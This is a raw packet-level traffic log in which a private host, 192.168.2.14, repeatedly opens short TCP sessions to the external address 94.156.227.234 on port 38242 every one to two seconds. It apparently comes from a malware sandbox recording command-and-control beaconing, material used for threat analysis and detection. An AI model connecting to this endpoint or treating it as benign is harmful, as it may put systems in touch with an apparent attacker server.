Dec 27, 2024 09:19:34.841747046 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:34.961307049 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:35.344778061 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:35.508160114 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:36.015288115 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:36.015352011 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:36.345644951 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:36.465970039 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:36.466046095 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:36.466068029 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:36.586463928 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:36.969436884 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:37.133127928 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:37.636710882 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:37.636863947 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:37.970316887 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:38.089864969 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:38.089922905 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:38.089950085 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:38.209470987 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:38.593405962 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:38.760426998 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:39.217366934 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:39.217434883 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:39.594340086 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:39.713805914 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:39.713906050 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:39.713918924 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:39.833442926 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:40.216945887 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:40.380036116 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:40.834073067 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:40.834281921 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:41.217938900 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:41.338671923 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:41.338808060 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:41.338821888 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:41.730014086 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:41.841959953 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:41.924524069 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:41.926425934 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:42.004019022 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:42.842675924 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:42.962256908 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:42.962311983 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:42.962340117 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:42.963371038 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:42.963460922 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:43.081824064 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:43.465094090 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:43.627969027 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:44.126394033 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:44.126481056 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:44.466424942 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:44.585980892 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:44.586112022 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:44.586112976 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:44.705699921 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:45.093493938 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:45.256122112 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:45.847628117 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:45.847754955 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:46.094556093 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:46.214052916 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:46.214114904 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:46.214313030 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:46.333738089 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:46.718280077 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:46.879967928 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:47.405917883 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:47.405972958 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:47.719258070 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:47.838871956 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:47.838994026 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:47.838994026 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:47.958653927 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:48.343301058 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:48.507970095 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:48.997833014 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:48.997953892 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:49.344326019 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:49.463876009 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:49.463963032 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:49.464000940 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:49.583522081 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:49.967924118 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:50.128159046 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:50.646138906 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:50.646276951 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:50.969026089 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:51.090389967 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:51.090488911 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:51.090543985 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:51.210165024 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:51.594213963 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:51.756023884 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:52.256035089 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:52.256233931 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:52.595334053 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:52.714843035 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:52.714889050 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:52.714910984 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:53.012222052 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:53.219854116 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:53.384051085 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:54.058589935 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:54.058690071 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:54.221479893 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:54.341130018 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:54.341357946 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:54.341357946 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:54.460964918 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:54.846766949 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:55.008024931 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:55.457978964 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:55.458054066 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:55.847951889 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:55.967685938 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:55.967807055 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:55.967963934 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:56.088087082 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:56.471811056 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:56.632083893 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:57.127590895 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:57.127753019 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:57.473543882 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:57.594407082 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:57.594660997 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:57.594660997 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:57.714255095 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:58.100024939 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:58.260014057 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:59.101727962 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:59.137824059 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:59.137897015 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:59.184062004 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:59.184150934 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:59.221175909 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:59.221587896 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:59.221587896 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:59.303600073 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:59.341149092 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:59.727947950 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:59.888119936 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:00.381028891 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:00.381232023 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:00.729373932 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:00.848951101 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:00.849056005 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:00.849226952 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:00.968646049 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:01.354443073 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:01.516067982 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:02.105525017 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:02.105581999 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:02.355649948 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:02.476777077 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:02.476928949 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:02.476941109 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:02.596422911 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:02.980756998 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:03.144201040 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:03.662981987 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:03.663050890 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:03.982022047 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:04.101597071 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:04.101672888 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:04.101722002 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:04.221131086 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:04.605623007 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:04.768035889 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:05.299129963 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:05.299213886 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:05.606885910 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:05.726399899 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:05.726675034 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:05.726705074 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:05.846133947 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:06.232462883 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:06.392087936 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:06.884740114 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:06.884859085 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:07.233730078 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:07.381000996 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:07.381203890 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:07.381203890 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:07.500657082 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:07.887497902 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:08.048062086 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:08.599605083 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:08.599711895 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:08.888561010 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:09.008517027 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:09.008569002 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:09.008732080 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:09.128264904 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:09.514225006 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:09.680084944 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:10.170747995 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:10.170810938 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:10.515353918 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:10.634907007 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:10.634972095 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:10.634991884 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:10.754553080 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:11.140038967 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:11.300050974 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:11.793643951 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:11.793872118 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:12.141592979 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:12.262912989 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:12.263010979 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:12.263257027 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:12.382702112 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:12.767805099 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:12.928126097 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:13.396254063 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:13.396437883 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:13.769119024 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:13.888736010 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:13.888850927 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:13.888931036 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:14.008410931 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:14.394156933 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:14.556065083 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:15.112593889 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:15.112669945 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:15.395791054 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:15.515336037 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:15.515419006 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:15.515500069 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:15.634844065 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:16.020231962 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:16.296052933 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:16.712588072 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:16.712832928 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:17.021429062 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:17.141030073 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:17.141174078 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:17.141174078 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:17.260695934 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:17.644629955 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:17.809459925 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:18.287507057 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:18.287620068 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:18.645628929 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:18.765126944 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:18.765180111 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:18.765204906 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:18.981518030 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:19.270525932 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:19.432136059 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:19.920296907 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:19.920389891 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:20.271908998 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:20.391809940 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:20.392019033 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:20.392019033 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:20.511590958 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:20.898092031 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:21.065979958 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:21.551825047 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:21.552040100 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:21.899889946 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:22.019438982 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:22.019555092 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:22.019763947 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:22.139277935 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:22.526269913 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:22.688153028 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:23.265111923 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:23.265244007 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:23.528039932 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:23.647675991 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:23.647819996 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:23.648029089 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:23.767477989 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:24.153238058 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:24.320185900 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:24.799572945 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:24.799673080 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:25.155100107 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:25.274785995 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:25.274874926 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:25.275072098 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:25.394540071 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:25.780695915 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:25.944212914 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:26.442617893 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:26.442868948 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:26.782053947 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:26.901860952 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:26.901938915 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:26.901993990 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:27.024058104 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:27.407336950 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:27.568164110 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:28.069612026 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:28.069690943 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:28.408931971 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:28.529954910 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:28.530083895 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:28.530153990 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:28.651221037 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:29.036544085 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:29.196165085 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:29.670769930 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:29.670862913 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:30.038088083 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:30.157579899 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:30.157660007 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:30.157732010 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:30.277446985 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:30.662367105 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:30.824297905 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:31.350395918 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:31.350610018 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:31.663901091 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:31.783404112 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:31.783478022 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:31.783565998 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:31.902996063 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:32.289225101 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:32.452143908 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:32.952543974 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:32.952784061 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:33.290498018 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:33.410011053 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:33.410151005 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:33.410151005 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:33.529684067 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:33.913758993 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:34.076282024 CET	38242	51472	94.156.227.234	192.168.2.14
